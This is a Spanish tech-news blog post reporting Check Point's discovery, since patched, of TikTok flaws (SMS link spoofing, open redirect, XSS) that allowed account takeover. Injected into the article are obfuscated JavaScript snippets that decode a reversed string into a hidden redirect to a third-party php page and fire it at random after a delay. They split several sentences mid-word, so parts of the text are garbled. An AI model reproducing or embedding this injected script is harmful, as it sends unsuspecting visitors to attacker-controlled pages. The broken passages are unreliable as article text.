Vulnerabilidad en TikTok permitía a los atacantes secuestrar cualquier cuenta
TikTok es la tercera aplicación más descargada del pasado 2019, cuenta con más de 500 millones de descargas y en estos momentos momentos parece no estar pasando por su mejor momento.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tok-1024×683-1.jpg?resize=768%2C512&ssl=1″ width=”768″ height=”512″ /></p>
<p>La seguridad de millones de usuarios está en tela de juicio ya que, investigadores de seguridad de Check Point han descubier<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to que la famosa aplicación china contenía una serie de vulnerabilidades potencialmente peligrosas que permitían secuestrar la cuenta de cualquier usuario simplemente conociendo su número de teléfono.
Entre las vulnerabilidades encontradas han sido reportadas algunas como por ejemplo suplantación de enlaces SMS, redirección abierta, e inyecciones XSS que, combinadas, permitían a los atacantes hacerse con el control de la cuenta.
Una vez que el atacante tenía acceso a la cuenta de la víctima podía eliminar cualquier vídeo del perfil, subir vídeos sin autorización, hacer públicos los vídeos privados y revelar la información personal guardada en la cuenta, como por ejemplo direcciones privadas y correos electrónicos.
ver video : https://youtu.be/JHnv5BQ3bF4
Como hemos visto en el vídeo anterior el ataque aprovecha un sistema de SMS inseguro que TikTok ofrece a los usuarios desde su sitio web para que podamos invitar a nuestros contactos a la aplicación.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tok-account.jpg?w=728&ssl=1[/img]” width=”728″ height=”600″ /></p>
<p>como era de esperar, la empresa que detectó estas vulnerabilidades informó a los desarrolladores de TikTok a finales de noviembre de 2019, quienes no tardaron en lanzar una nueva versión donde se corregían es<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos fallos de seguridad.
Se recomienda actualizar a la última versión de la aplicación que está disponible en los markets oficiales de Android e iOS.
Fuentes
tok-account.html
saludos
ms, 13-1-2020
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.